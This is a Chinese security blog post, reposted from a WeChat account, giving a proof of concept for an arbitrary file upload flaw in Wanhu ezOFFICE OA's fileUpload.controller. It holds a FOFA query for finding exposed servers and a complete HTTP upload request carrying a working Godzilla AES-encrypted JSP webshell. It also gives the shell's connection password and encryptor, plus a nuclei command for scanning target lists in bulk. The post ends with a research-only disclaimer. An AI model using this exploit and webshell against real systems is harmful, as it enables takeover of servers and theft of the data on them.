万户OA fileUpload.controller 任意文件上传漏洞 POC

admin 2022年9月28日20:51:48评论687 views字数 2009阅读6分41秒阅读模式

0x02 漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OA fileUpload.controller处存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器,导致服务器失陷

万户OA fileUpload.controller 任意文件上传漏洞 POC

0x03 漏洞复现

fofaapp="万户网络-ezOFFICE"

1.执行POC写入哥斯拉马,返回上传后的文件名

POST /defaultroot/upload/fileUpload.controller HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0Content-Length: 1318
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0Content-Disposition: form-data; name="file"; filename="cmd.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary
<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%>--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--

万户OA fileUpload.controller 任意文件上传漏洞 POC

2.哥斯拉连接,获得一个webshell

连接地址:http://{{Hostname}}/defaultroot/upload/html/返回文件名.jsp密码:pass加密器:JAVA_AES_RAW

万户OA fileUpload.controller 任意文件上传漏洞 POC

3.nuclei批量验证脚本已发表于知识星球

nuclei.exe -t wanhuOA_fileUpload_upload.yaml -l subs.txt stats

万户OA fileUpload.controller 任意文件上传漏洞 POC

 

原文始发于微信公众号(融云攻防实验室):万户OA fileUpload.controller 任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月28日20:51:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万户OA fileUpload.controller 任意文件上传漏洞 POChttps://cn-sec.com/archives/1322032.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息